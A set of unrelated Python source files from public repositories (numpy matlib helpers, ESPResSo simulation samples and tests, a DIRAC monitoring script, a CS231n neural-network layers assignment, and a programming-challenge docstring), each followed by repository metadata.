identity : Square identity matrix.
Examples
--------
>>> import numpy.matlib
>>> np.matlib.eye(3, k=1, dtype=float)
matrix([[0., 1., 0.],
[0., 0., 1.],
[0., 0., 0.]])
"""
return asmatrix(np.eye(n, M=M, k=k, dtype=dtype, order=order))
def rand(*args):
"""
Return a matrix of random values with given shape.
Create a matrix of the given shape and propagate it with
random samples from a uniform distribution over ``[0, 1)``.
Parameters
----------
\\*args : Arguments
Shape of the output.
If given as N integers, each integer specifies the size of one
dimension.
If given as a tuple, this tuple gives the complete shape.
Returns
-------
out : ndarray
The matrix of random values with shape given by `\\*args`.
See Also
--------
randn, numpy.random.rand
Examples
--------
>>> np.random.seed(123)
>>> import numpy.matlib
>>> np.matlib.rand(2, 3)
matrix([[0.69646919, 0.28613933, 0.22685145],
[0.55131477, 0.71946897, 0.42310646]])
>>> np.matlib.rand((2, 3))
matrix([[0.9807642 , 0.68482974, 0.4809319 ],
[0.39211752, 0.34317802, 0.72904971]])
If the first argument is a tuple, other arguments are ignored:
>>> np.matlib.rand((2, 3), 4)
matrix([[0.43857224, 0.0596779 , 0.39804426],
[0.73799541, 0.18249173, 0.17545176]])
"""
if isinstance(args[0], tuple):
args = args[0]
return asmatrix(np.random.rand(*args))
def randn(*args):
"""
Return a random matrix with data from the "standard normal" distribution.
`randn` generates a matrix filled with random floats sampled from a
univariate "normal" (Gaussian) distribution of mean 0 and variance 1.
Parameters
----------
\\*args : Arguments
Shape of the output.
If given as N integers, each integer specifies the size of one
dimension. If given as a tuple, this tuple gives the complete shape.
Returns
-------
Z : matrix of floats
A matrix of floating-point samples drawn from the standard normal
distribution.
See Also
--------
rand, random.randn
Notes
-----
For random samples from :math:`N(\\mu, \\sigma^2)`, use:
``sigma * np.matlib.randn(...) + mu``
Examples
--------
>>> np.random.seed(123)
>>> import numpy.matlib
>>> np.matlib.randn(1)
matrix([[-1.0856306]])
>>> np.matlib.randn(1, 2, 3)
matrix([[ 0.99734545, 0.2829785 , -1.50629471],
[-0.57860025, 1.65143654, -2.42667924]])
Two-by-four matrix of samples from :math:`N(3, 6.25)`:
>>> 2.5 * np.matlib.randn((2, 4)) + 3
matrix([[1.92771843, 6.16484065, 0.83314899, 1.30278462],
[2.76322758, 6.72847407, 1.40274501, 1.8900451 ]])
"""
if isinstance(args[0], tuple):
args = args[0]
return asmatrix(np.random.randn(*args))
def repmat(a, m, n):
"""
Repeat a 0-D to 2-D array or matrix MxN times.
Parameters
----------
a : array_like
The array or matrix to be repeated.
m, n : int
The number of times `a` is repeated along the first and second axes.
Returns
-------
out : ndarray
The result of repeating `a`.
Examples
--------
>>> import numpy.matlib
>>> a0 = np.array(1)
>>> np.matlib.repmat(a0, 2, 3)
array([[1, 1, 1],
[1, 1, 1]])
>>> a1 = np.arange(4)
>>> np.matlib.repmat(a1, 2, 2)
array([[0, 1, 2, 3, 0, 1, 2, 3],
[0, 1, 2, 3, 0, 1, 2, 3]])
>>> a2 = np.asmatrix(np.arange(6).reshape(2, 3))
>>> np.matlib.repmat(a2, 2, 3)
matrix([[0, 1, 2, 0, 1, 2, 0, 1, 2],
[3, 4, 5, 3, 4, 5, 3, 4, 5],
[0, 1, 2, 0, 1, 2, 0, 1, 2],
[3, 4, 5, 3, 4, 5, 3, 4, 5]])
"""
a = asanyarray(a)
ndim = a.ndim
if ndim == 0:
origrows, origcols = (1, 1)
elif ndim == 1:
origrows, origcols = (1, a.shape[0])
else:
origrows, origcols = a.shape
rows = origrows * m
cols = origcols * n
c = a.reshape(1, a.size).repeat(m, 0).reshape(rows, origcols).repeat(n, 0)
return c.reshape(rows, cols)
| shoyer/numpy | numpy/matlib.py | Python | bsd-3-clause | 9,694 | [
"Gaussian"
] | 614f25041b63f1f25f0d49ea60896b141401d047e40f76f0bd07344cdf54425e |
# Copyright (C) 2010-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Set up an electrokinetics (LB) fluid confined between charged walls.
"""
import espressomd
required_features = ["ELECTROKINETICS", "EK_BOUNDARIES", "EXTERNAL_FORCES"]
espressomd.assert_features(required_features)
from espressomd import System, shapes, electrokinetics, ekboundaries
import os
system = System(box_l=[10, 10, 10])
system.cell_system.skin = 0.4
system.time_step = 0.1
ek = electrokinetics.Electrokinetics(
lb_density=1, friction=1, agrid=1, viscosity=1, T=1, prefactor=1)
pos = electrokinetics.Species(
density=0.05, D=0.1, valency=1, ext_force_density=[0, 0, 1.])
neg = electrokinetics.Species(
density=0.05, D=0.1, valency=-1, ext_force_density=[0, 0, -1.])
ek.add_species(pos)
ek.add_species(neg)
system.actors.add(ek)
print(ek.get_params())
print(pos.get_params())
print(neg.get_params())
print(pos[5, 5, 5].density)
ek_wall_left = ekboundaries.EKBoundary(
shape=shapes.Wall(dist=1, normal=[1, 0, 0]), charge_density=-0.01)
ek_wall_right = ekboundaries.EKBoundary(
shape=shapes.Wall(dist=-9, normal=[-1, 0, 0]), charge_density=0.01)
system.ekboundaries.add(ek_wall_left)
system.ekboundaries.add(ek_wall_right)
if not os.path.isdir("ek"):
os.makedirs("ek")
n_int_cycles = 1000
for i in range(n_int_cycles):
system.integrator.run(100)
print("\rIntegrating: %03i" % i, end='', flush=True)
pos.print_vtk_density("ek/pos_dens_%i.vtk" % i)
neg.print_vtk_density("ek/neg_dens_%i.vtk" % i)
pos.print_vtk_flux("ek/pos_flux_%i.vtk" % i)
neg.print_vtk_flux("ek/neg_flux_%i.vtk" % i)
ek.print_vtk_velocity("ek/ekv_%i.vtk" % i)
ek.print_vtk_boundary("ek/ekb_%i.vtk" % i)
| KaiSzuttor/espresso | samples/ekboundaries.py | Python | gpl-3.0 | 2,361 | [
"ESPResSo",
"VTK"
] | d356ea0e6e21f7f355473b2f64afc7fa669adeff07522d804a90767efd1d5bfe |
#!/usr/bin/env python
"""
Monitor the jobs present in the repository
Usage:
dirac-repo-monitor [options] ... RepoDir
Arguments:
RepoDir: Location of Job Repository
"""
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
__RCSID__ = "$Id$"
import DIRAC
from DIRAC.Core.Base import Script
from DIRAC.Core.Utilities.DIRACScript import DIRACScript
@DIRACScript()
def main():
Script.parseCommandLine(ignoreErrors=False)
args = Script.getPositionalArgs()
if len(args) != 1:
Script.showHelp()
repoLocation = args[0]
from DIRAC.Interfaces.API.Dirac import Dirac
dirac = Dirac(withRepo=True, repoLocation=repoLocation)
exitCode = 0
result = dirac.monitorRepository(printOutput=True)
if not result['OK']:
print('ERROR: ', result['Message'])
exitCode = 2
DIRAC.exit(exitCode)
if __name__ == "__main__":
main()
| yujikato/DIRAC | src/DIRAC/Interfaces/scripts/dirac_repo_monitor.py | Python | gpl-3.0 | 907 | [
"DIRAC"
] | 732665c129c5998a246a2b4fa768ce7123cf23cb61cc76d7f65e604155094518 |
from builtins import range
import numpy as np
def affine_forward(x, w, b):
"""
Computes the forward pass for an affine (fully-connected) layer.
The input x has shape (N, d_1, ..., d_k) and contains a minibatch of N
examples, where each example x[i] has shape (d_1, ..., d_k). We will
reshape each input into a vector of dimension D = d_1 * ... * d_k, and
then transform it to an output vector of dimension M.
Inputs:
- x: A numpy array containing input data, of shape (N, d_1, ..., d_k)
- w: A numpy array of weights, of shape (D, M)
- b: A numpy array of biases, of shape (M,)
Returns a tuple of:
- out: output, of shape (N, M)
- cache: (x, w, b)
"""
out = None
###########################################################################
# TODO: Implement the affine forward pass. Store the result in out. You #
# will need to reshape the input into rows. #
###########################################################################
N = x.shape[0]
x_reshape = x.reshape((N,-1))
out = x_reshape.dot(w)+b
###########################################################################
# END OF YOUR CODE #
###########################################################################
cache = (x, w, b)
return out, cache
def affine_backward(dout, cache):
"""
Computes the backward pass for an affine layer.
Inputs:
- dout: Upstream derivative, of shape (N, M)
- cache: Tuple of:
- x: Input data, of shape (N, d_1, ... d_k)
- w: Weights, of shape (D, M)
Returns a tuple of:
- dx: Gradient with respect to x, of shape (N, d1, ..., d_k)
- dw: Gradient with respect to w, of shape (D, M)
- db: Gradient with respect to b, of shape (M,)
"""
x, w, b = cache
dx, dw, db = None, None, None
###########################################################################
# TODO: Implement the affine backward pass. #
###########################################################################
shape_x = x.shape
x_reshape = x.reshape((shape_x[0],-1))
dw = x_reshape.T.dot(dout)
dx = dout.dot(w.T)
db = np.sum(dout,axis=0)
dx = dx.reshape(shape_x)
###########################################################################
# END OF YOUR CODE #
###########################################################################
return dx, dw, db
def relu_forward(x):
"""
Computes the forward pass for a layer of rectified linear units (ReLUs).
Input:
- x: Inputs, of any shape
Returns a tuple of:
- out: Output, of the same shape as x
- cache: x
"""
out = None
###########################################################################
# TODO: Implement the ReLU forward pass. #
###########################################################################
out = np.copy(x)
out[out<0]=0
###########################################################################
# END OF YOUR CODE #
###########################################################################
cache = x
return out, cache
def relu_backward(dout, cache):
"""
Computes the backward pass for a layer of rectified linear units (ReLUs).
Input:
- dout: Upstream derivatives, of any shape
- cache: Input x, of same shape as dout
Returns:
- dx: Gradient with respect to x
"""
dx, x = None, cache
###########################################################################
# TODO: Implement the ReLU backward pass. #
###########################################################################
dx = np.zeros(x.shape)
dx[x>0] = 1
dx = dx * dout
###########################################################################
# END OF YOUR CODE #
###########################################################################
return dx
def batchnorm_forward(x, gamma, beta, bn_param):
"""
Forward pass for batch normalization.
During training the sample mean and (uncorrected) sample variance are
computed from minibatch statistics and used to normalize the incoming data.
During training we also keep an exponentially decaying running mean of the
mean and variance of each feature, and these averages are used to normalize
data at test-time.
At each timestep we update the running averages for mean and variance using
an exponential decay based on the momentum parameter:
running_mean = momentum * running_mean + (1 - momentum) * sample_mean
running_var = momentum * running_var + (1 - momentum) * sample_var
Note that the batch normalization paper suggests a different test-time
behavior: they compute sample mean and variance for each feature using a
large number of training images rather than using a running average. For
this implementation we have chosen to use running averages instead since
they do not require an additional estimation step; the torch7
implementation of batch normalization also uses running averages.
Input:
- x: Data of shape (N, D)
- gamma: Scale parameter of shape (D,)
- beta: Shift paremeter of shape (D,)
- bn_param: Dictionary with the following keys:
- mode: 'train' or 'test'; required
- eps: Constant for numeric stability
- momentum: Constant for running mean / variance.
- running_mean: Array of shape (D,) giving running mean of features
- running_var Array of shape (D,) giving running variance of features
Returns a tuple of:
- out: of shape (N, D)
- cache: A tuple of values needed in the backward pass
"""
mode = bn_param['mode']
eps = bn_param.get('eps', 1e-5)
momentum = bn_param.get('momentum', 0.9)
N, D = x.shape
running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))
running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))
out, cache = None, None
if mode == 'train':
#######################################################################
# TODO: Implement the training-time forward pass for batch norm. #
# Use minibatch statistics to compute the mean and variance, use #
# these statistics to normalize the incoming data, and scale and #
# shift the normalized data using gamma and beta. #
# #
# You should store the output in the variable out. Any intermediates #
# that you need for the backward pass should be stored in the cache #
# variable. #
# #
# You should also use your computed sample mean and variance together #
# with the momentum variable to update the running mean and running #
# variance, storing your result in the running_mean and running_var #
# variables. #
#######################################################################
x_mean = np.mean(x,axis=0)
x_var = np.var(x,axis=0) + eps
x_var_sqrt = np.sqrt(x_var)
x_normalize = (x - x_mean)/x_var_sqrt
out = gamma * x_normalize + beta
running_mean = momentum * running_mean + (1.0 - momentum) * x_mean
running_var = momentum * running_var + (1.0 - momentum) * x_var
cache = (x,gamma,eps)
#######################################################################
# END OF YOUR CODE #
#######################################################################
elif mode == 'test':
#######################################################################
# TODO: Implement the test-time forward pass for batch normalization. #
# Use the running mean and variance to normalize the incoming data, #
# then scale and shift the normalized data using gamma and beta. #
# Store the result in the out variable. #
#######################################################################
x_normalize = (x - running_mean) / np.sqrt(running_var)
out = gamma * x_normalize + beta
#######################################################################
# END OF YOUR CODE #
#######################################################################
else:
raise ValueError('Invalid forward batchnorm mode "%s"' % mode)
# Store the updated running means back into bn_param
bn_param['running_mean'] = running_mean
bn_param['running_var'] = running_var
return out, cache
def batchnorm_backward(dout, cache):
"""
Backward pass for batch normalization.
For this implementation, you should write out a computation graph for
batch normalization on paper and propagate gradients backward through
intermediate nodes.
Inputs:
- dout: Upstream derivatives, of shape (N, D)
- cache: Variable of intermediates from batchnorm_forward.
Returns a tuple of:
- dx: Gradient with respect to inputs x, of shape (N, D)
- dgamma: Gradient with respect to scale parameter gamma, of shape (D,)
- dbeta: Gradient with respect to shift parameter beta, of shape (D,)
"""
dx, dgamma, dbeta = None, None, None
###########################################################################
# TODO: Implement the backward pass for batch normalization. Store the #
# results in the dx, dgamma, and dbeta variables. #
###########################################################################
x,gamma,eps = cache
x_mean = np.mean(x,axis=0)
x_var = np.var(x,axis=0) + eps
x_var_sqrt = np.sqrt(x_var)
x_normalize = (x - x_mean)/x_var_sqrt
N, D = x.shape
error_feature_wise = np.sum(dout,axis=0) # 1 x D
dbeta = error_feature_wise # 1 x D
dgamma = np.sum(x_normalize * dout, axis=0) # 1 x D
dx = np.zeros_like(x)
# normalization gradients
dnormalization = gamma * dout # N x D
dx_u = 1.0/x_var_sqrt * dnormalization
dmul = (x - x_mean) * dnormalization
d_1_by_x = -1 / x_var * dmul
d_root_x = 1/2.0 * (x_var ** -0.5) * d_1_by_x
d_sum_x = 1.0/N * np.sum(d_root_x,axis=0)
d_x_square = 2 * (x - x_mean) * d_sum_x
dx_u += d_x_square
dx = dx_u + (-1.0/N) * np.sum(dx_u,axis=0)
###########################################################################
# END OF YOUR CODE #
###########################################################################
return dx, dgamma, dbeta
def batchnorm_backward_alt(dout, cache):
"""
Alternative backward pass for batch normalization.
For this implementation you should work out the derivatives for the batch
normalizaton backward pass on paper and simplify as much as possible. You
should be able to derive a simple expression for the backward pass.
Note: This implementation should expect to receive the same cache variable
as batchnorm_backward, but might not use all of the values in the cache.
Inputs / outputs: Same as batchnorm_backward
"""
dx, dgamma, dbeta = None, None, None
###########################################################################
# TODO: Implement the backward pass for batch normalization. Store the #
# results in the dx, dgamma, and dbeta variables. #
# #
# After computing the gradient with respect to the centered inputs, you #
# should be able to compute gradients with respect to the inputs in a #
# single statement; our implementation fits on a single 80-character line.#
###########################################################################
x,gamma,eps = cache
x_mean = np.mean(x,axis=0)
x_var = np.var(x,axis=0) + eps
x_var_sqrt = np.sqrt(x_var)
x_normalize = (x - x_mean)/x_var_sqrt
N, D = x.shape
error_feature_wise = np.sum(dout,axis=0) # 1 x D
dbeta = error_feature_wise # 1 x D
dgamma = np.sum(x_normalize * dout, axis=0) # 1 x D
dx = np.zeros_like(x)
# normalization gradients
dnormalization = gamma * dout # N x D
dmean = -1/2.0 * (x - x_mean) * (x_var_sqrt)**(-3) * dnormalization # merge till sum
dx_u = 2.0/N * (x - x_mean) * np.sum(dmean,axis=0) # merge from sum till (x-u)
dx_u += 1.0/x_var_sqrt * dnormalization
dx = dx_u + (-1.0/N) * np.sum(dx_u,axis=0)
###########################################################################
# END OF YOUR CODE #
###########################################################################
return dx, dgamma, dbeta
def dropout_forward(x, dropout_param):
"""
Performs the forward pass for (inverted) dropout.
Inputs:
- x: Input data, of any shape
- dropout_param: A dictionary with the following keys:
- p: Dropout parameter. We drop each neuron output with probability p.
- mode: 'test' or 'train'. If the mode is train, then perform dropout;
if the mode is test, then just return the input.
- seed: Seed for the random number generator. Passing seed makes this
function deterministic, which is needed for gradient checking but not
in real networks.
Outputs:
- out: Array of the same shape as x.
- cache: tuple (dropout_param, mask). In training mode, mask is the dropout
mask that was used to multiply the input; in test mode, mask is None.
"""
p, mode = dropout_param['p'], dropout_param['mode']
if 'seed' in dropout_param:
np.random.seed(dropout_param['seed'])
mask = None
out = None
if mode == 'train':
#######################################################################
# TODO: Implement training phase forward pass for inverted dropout. #
# Store the dropout mask in the mask variable. #
#######################################################################
# divided by p scaled!
mask = (np.random.random_sample(x.shape) < p)/p
out = mask * x
#######################################################################
# END OF YOUR CODE #
#######################################################################
elif mode == 'test':
#######################################################################
# TODO: Implement the test phase forward pass for inverted dropout. #
#######################################################################
out = x
#######################################################################
# END OF YOUR CODE #
#######################################################################
cache = (dropout_param, mask)
out = out.astype(x.dtype, copy=False)
return out, cache
def dropout_backward(dout, cache):
"""
Perform the backward pass for (inverted) dropout.
Inputs:
- dout: Upstream derivatives, of any shape
- cache: (dropout_param, mask) from dropout_forward.
"""
dropout_param, mask = cache
mode = dropout_param['mode']
dx = None
if mode == 'train':
#######################################################################
# TODO: Implement training phase backward pass for inverted dropout #
#######################################################################
dx = mask * dout
#######################################################################
# END OF YOUR CODE #
#######################################################################
elif mode == 'test':
dx = dout
return dx
def conv_forward_naive(x, w, b, conv_param):
"""
A naive implementation of the forward pass for a convolutional layer.
The input consists of N data points, each with C channels, height H and
width W. We convolve each input with F different filters, where each filter
spans all C channels and has height HH and width HH.
Input:
- x: Input data of shape (N, C, H, W)
- w: Filter weights of shape (F, C, HH, WW)
- b: Biases, of shape (F,)
- conv_param: A dictionary with the following keys:
- 'stride': The number of pixels between adjacent receptive fields in the
horizontal and vertical directions.
- 'pad': The number of pixels that will be used to zero-pad the input.
Returns a tuple of:
- out: Output data, of shape (N, F, H', W') where H' and W' are given by
H' = 1 + (H + 2 * pad - HH) / stride
W' = 1 + (W + 2 * pad - WW) / stride
- cache: (x, w, b, conv_param)
"""
out = None
###########################################################################
# TODO: Implement the convolutional forward pass. #
# Hint: you can use the function np.pad for padding. #
###########################################################################
pad = conv_param['pad']
stride = conv_param['stride']
N, C, H, W = x.shape
F, C, HH, WW = w.shape
H_r = int(1 + (H + 2 * pad - HH) / stride)
W_r = int(1 + (W + 2 * pad - WW) / stride)
out = np.zeros((N, F, H_r, W_r))
# No padding to N and C, pad H and W (N,C,H,W)
padding_tuple = ((0,0),(0,0),(pad,pad),(pad,pad))
x_padded = np.pad(x,padding_tuple,'constant')
for h in range(H_r):
for wd in range(W_r):
lh = h * stride # left side height
lr = lh + HH # rigth side height
lw = wd * stride # left side width
rw = lw + WW # rigth side width
data = x_padded[:,:,lh:lr,lw:rw] # N x C x HH x WW
for f in range(F):
cfilter = w[f] # 1 x C x HH x WW
res = cfilter * data # N x C x HH x WW
res_sum = np.sum(res,axis=(1,2,3)) + b[f] # N x 1
out[:,f,h,wd] = res_sum
###########################################################################
# END OF YOUR CODE #
###########################################################################
cache = (x, w, b, conv_param)
return out, cache
def conv_backward_naive(dout, cache):
"""
A naive implementation of the backward pass for a convolutional layer.
Inputs:
- dout: Upstream derivatives.
- cache: A tuple of (x, w, b, conv_param) as in conv_forward_naive
Returns a tuple of:
- dx: Gradient with respect to x
- dw: Gradient with respect to w
- db: Gradient with respect to b
"""
dx, dw, db = None, None, None
###########################################################################
# TODO: Implement the convolutional backward pass. #
###########################################################################
x, w, b, conv_param = cache
pad = conv_param['pad']
stride = conv_param['stride']
N, C, H, W = x.shape
F, C, HH, WW = w.shape
N, F, H_r, W_r = dout.shape
#init
dx = np.zeros_like(x)
dw = np.zeros_like(w)
db = np.zeros_like(b)
# No padding to N and C, pad H and W (N,C,H,W)
padding_tuple = ((0,0),(0,0),(pad,pad),(pad,pad))
x_padded = np.pad(x,padding_tuple,'constant')
dx_padded = np.zeros_like(x_padded)
for h in range(H_r):
for wd in range(W_r):
lh = h * stride # left side height
lr = lh + HH # rigth side height
lw = wd * stride # left side width
rw = lw + WW # rigth side width
data = x_padded[:,:,lh:lr,lw:rw] # N x C x HH x WW
for f in range(F):
# delta at particular position
delta = dout[:,f,h,wd].reshape((N,1,1,1)) # N x 1 x 1 x 1
dw[f] += np.sum(delta * data, axis=0) # C x HH x WW
db[f] += np.sum(dout[:,f,h,wd]) # 1
dx_padded[:,:,lh:lr,lw:rw] += w[f] * delta # N x C x HH x WW
#unpad
dx = dx_padded[:,:,pad:H+pad,pad:W+pad]
###########################################################################
# END OF YOUR CODE #
###########################################################################
return dx, dw, db
def max_pool_forward_naive(x, pool_param):
"""
A naive implementation of the forward pass for a max pooling layer.
Inputs:
- x: Input data, of shape (N, C, H, W)
- pool_param: dictionary with the following keys:
- 'pool_height': The height of each pooling region
- 'pool_width': The width of each pooling region
- 'stride': The distance between adjacent pooling regions
Returns a tuple of:
- out: Output data
- cache: (x, pool_param)
"""
out = None
###########################################################################
# TODO: Implement the max pooling forward pass #
###########################################################################
pool_height = pool_param['pool_height']
pool_width = pool_param['pool_width']
stride = pool_param['stride']
N, C, H, W = x.shape
H_r = int(1 + (H - pool_height) / stride)
W_r = int(1 + (W - pool_width) / stride)
out = np.zeros((N,C,H_r,W_r))
for h in range(H_r):
for wd in range(W_r):
lh = h * stride # left side height
lr = lh + pool_height # rigth side height
lw = wd * stride # left side width
rw = lw + pool_width # rigth side width
data = x[:,:,lh:lr,lw:rw] # N x C x pool_height x pool_width
out[:,:,h,wd] = np.max(data,axis=(2,3)) # N x C x 1
###########################################################################
# END OF YOUR CODE #
###########################################################################
cache = (x, pool_param)
return out, cache
def max_pool_backward_naive(dout, cache):
"""
A naive implementation of the backward pass for a max pooling layer.
Inputs:
- dout: Upstream derivatives
- cache: A tuple of (x, pool_param) as in the forward pass.
Returns:
- dx: Gradient with respect to x
"""
dx = None
###########################################################################
# TODO: Implement the max pooling backward pass #
###########################################################################
x, pool_param = cache
pool_height = pool_param['pool_height']
pool_width = pool_param['pool_width']
stride = pool_param['stride']
dx = np.zeros_like(x)
N, C, H_r, W_r = dout.shape
for h in range(H_r):
for wd in range(W_r):
lh = h * stride # left side height
lr = lh + pool_height # rigth side height
lw = wd * stride # left side width
rw = lw + pool_width # rigth side width
data = x[:,:,lh:lr,lw:rw] # N x C x pool_height x pool_width
max_data = np.max(data,axis=(2,3)).reshape((N,C,1,1))
# bug : if two cells have max value ... (ideally : only one should be kept)
mask = data >= max_data
delta = dout[:,:,h,wd].reshape((N,C,1,1))
dx[:,:,lh:lr,lw:rw] = delta * mask
###########################################################################
# END OF YOUR CODE #
###########################################################################
return dx
def spatial_batchnorm_forward(x, gamma, beta, bn_param):
"""
Computes the forward pass for spatial batch normalization.
Inputs:
- x: Input data of shape (N, C, H, W)
- gamma: Scale parameter, of shape (C,)
- beta: Shift parameter, of shape (C,)
- bn_param: Dictionary with the following keys:
- mode: 'train' or 'test'; required
- eps: Constant for numeric stability
- momentum: Constant for running mean / variance. momentum=0 means that
old information is discarded completely at every time step, while
momentum=1 means that new information is never incorporated. The
default of momentum=0.9 should work well in most situations.
- running_mean: Array of shape (D,) giving running mean of features
- running_var Array of shape (D,) giving running variance of features
Returns a tuple of:
- out: Output data, of shape (N, C, H, W)
- cache: Values needed for the backward pass
"""
out, cache = None, None
###########################################################################
# TODO: Implement the forward pass for spatial batch normalization. #
# #
# HINT: You can implement spatial batch normalization using the vanilla #
# version of batch normalization defined above. Your implementation should#
# be very short; ours is less than five lines. #
###########################################################################
N, C, H, W = x.shape
x_transpose = np.transpose(x,(0,2,3,1))
x_2d = x_transpose.reshape((N * H * W,-1))
out_2d, cache = batchnorm_forward(x_2d,gamma,beta,bn_param)
out_transpose = out_2d.reshape((N,H,W,-1))
out = np.transpose(out_transpose,(0,3,1,2))
###########################################################################
# END OF YOUR CODE #
###########################################################################
return out, cache
def spatial_batchnorm_backward(dout, cache):
"""
Computes the backward pass for spatial batch normalization.
Inputs:
- dout: Upstream derivatives, of shape (N, C, H, W)
- cache: Values from the forward pass
Returns a tuple of:
- dx: Gradient with respect to inputs, of shape (N, C, H, W)
- dgamma: Gradient with respect to scale parameter, of shape (C,)
- dbeta: Gradient with respect to shift parameter, of shape (C,)
"""
dx, dgamma, dbeta = None, None, None
###########################################################################
# TODO: Implement the backward pass for spatial batch normalization. #
# #
# HINT: You can implement spatial batch normalization using the vanilla #
# version of batch normalization defined above. Your implementation should#
# be very short; ours is less than five lines. #
###########################################################################
N, C, H, W = dout.shape
dout_transpose = np.transpose(dout,(0,2,3,1))
dout_2d = dout_transpose.reshape((N * H * W,-1))
dx_2d, dgamma, dbeta = batchnorm_backward(dout_2d,cache)
dx_transpose = dx_2d.reshape((N,H,W,-1))
dx = np.transpose(dx_transpose,(0,3,1,2))
###########################################################################
# END OF YOUR CODE #
###########################################################################
return dx, dgamma, dbeta
def svm_loss(x, y):
"""
Computes the loss and gradient using for multiclass SVM classification.
Inputs:
- x: Input data, of shape (N, C) where x[i, j] is the score for the jth
class for the ith input.
- y: Vector of labels, of shape (N,) where y[i] is the label for x[i] and
0 <= y[i] < C
Returns a tuple of:
- loss: Scalar giving the loss
- dx: Gradient of the loss with respect to x
"""
N = x.shape[0]
correct_class_scores = x[np.arange(N), y]
margins = np.maximum(0, x - correct_class_scores[:, np.newaxis] + 1.0)
margins[np.arange(N), y] = 0
loss = np.sum(margins) / N
num_pos = np.sum(margins > 0, axis=1)
dx = np.zeros_like(x)
dx[margins > 0] = 1
dx[np.arange(N), y] -= num_pos
dx /= N
return loss, dx
def softmax_loss(x, y):
"""
Computes the loss and gradient for softmax classification.
Inputs:
- x: Input data, of shape (N, C) where x[i, j] is the score for the jth
class for the ith input.
- y: Vector of labels, of shape (N,) where y[i] is the label for x[i] and
0 <= y[i] < C
Returns a tuple of:
- loss: Scalar giving the loss
- dx: Gradient of the loss with respect to x
"""
shifted_logits = x - np.max(x, axis=1, keepdims=True)
Z = np.sum(np.exp(shifted_logits), axis=1, keepdims=True)
log_probs = shifted_logits - np.log(Z)
probs = np.exp(log_probs)
N = x.shape[0]
loss = -np.sum(log_probs[np.arange(N), y]) / N
dx = probs.copy()
dx[np.arange(N), y] -= 1
dx /= N
return loss, dx
| kabrapratik28/Stanford_courses | cs231n/assignment2/cs231n/layers.py | Python | apache-2.0 | 30,161 | [
"NEURON"
] | 2866e45c290a7cc3676b6ecf14d505e7681cc91cadb0ebf8c8c242f6dd38a4f6 |
#
# Copyright (C) 2019-2020 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import unittest as ut
import unittest_decorators as utx
import stokesian_dynamics as sd
@utx.skipIfMissingFeatures(["STOKESIAN_DYNAMICS"])
class StokesianDynamicsSetupTest(sd.StokesianDynamicsSetupTest):
device = 'cpu'
def test_pbc_checks(self):
self.pbc_checks()
@utx.skipIfMissingFeatures(["STOKESIAN_DYNAMICS"])
class StokesianDynamicsTest(sd.StokesianDynamicsTest):
device = 'cpu'
def test_default(self):
self.falling_spheres(1.0, 1.0, 1.0)
def test_rescaled(self):
self.falling_spheres(1.0, 4.5, 2.5)
def test_different_time_step(self):
self.falling_spheres(0.7, 1.0, 1.0)
def test_default_ft(self):
self.falling_spheres(1.0, 1.0, 1.0, 'ft')
@utx.skipIfMissingFeatures(["STOKESIAN_DYNAMICS"])
class StokesianDiffusionTest(sd.StokesianDiffusionTest):
device = 'cpu'
def test(self):
self.check()
if __name__ == '__main__':
ut.main()
| KaiSzuttor/espresso | testsuite/python/stokesian_dynamics_cpu.py | Python | gpl-3.0 | 1,652 | [
"ESPResSo"
] | 10cabb69806d48f68e60b3df0c4db5c135ba74e10dd64d4e5ef60a79a1dea80c |
"""
[4-19-2014] Challenge #154 [Intermediate] Gorellian Alphabet Sort
https://www.reddit.com/r/dailyprogrammer/comments/20sjif/4192014_challenge_154_intermediate_gorellian/
#**Description:**
The Gorellians, at the far end of our galaxy, have discovered various samples of English text from our electronic
transmissions, but they did not find the order of our alphabet. Being a very organized and orderly species, they want
to have a way of ordering words, even in the strange symbols of English. Hence they must determine their own order.
For instance, if they agree on the alphabetical order:
UVWXYZNOPQRSTHIJKLMABCDEFG
Then the following words would be in sorted order based on the above alphabet order:
WHATEVER
ZONE
HOW
HOWEVER
HILL
ANY
ANTLER
COW
***
#**Input:**
The input will be formatted to enter the number of words to sort and the new Alphabet ordering and a list of words to
sort. n should be > 0. The alphabet is assumed to be 26 letters with no duplicates and arranged in the new order. Also
assumed there are n strings entered.
n (new alphabet ordering)
(word 1 of n)
(word 2 of n)
....
(word n of n)
##Example input 1:
8 UVWXYZNOPQRSTHIJKLMABCDEFG
ANTLER
ANY
COW
HILL
HOW
HOWEVER
WHATEVER
ZONE
***
#**Output:**
The list of words in sorted order based on the new order of the alphabet. The sort order should be based on the
alphabet (case insensitive) and the words should be output to appear as the words were entered.
##Example of output for input 1:
WHATEVER
ZONE
HOW
HOWEVER
HILL
ANY
ANTLER
COW
***
#**Notes:**
The sorting should be case insensitive. Meaning that you do not sort it based on the ASCII value of the letters but by
the letters. Your solution should handle an alphabet order that might be typed in upper/lower case. It will sort the
words by this order and output the words as they were typed in.
##Example Input 2:
5 ZYXWVuTSRQpONMLkJIHGFEDCBa
go
aLL
ACM
teamS
Go
##Example output 2:
teamS
go
Go
aLL
ACM
***
#**Extra Challenge:**
Error check the input.
***
If the alphabet is missing letters it returns an error message and listing letters missing.
##Input for this:
4 abcdfghijklmnopsuvxz
error
checking
is
fun
##Output for this:
Error! Missing letters: e q r t w y
***
If the alphabet has duplicate letters it returns an error message listing all the duplicate letters used in the
alphabet.
##Input for this:
4 abcdefaghijklmnoepqrstiuvwoxuyz
oh
really
yah
really
##Output for this:
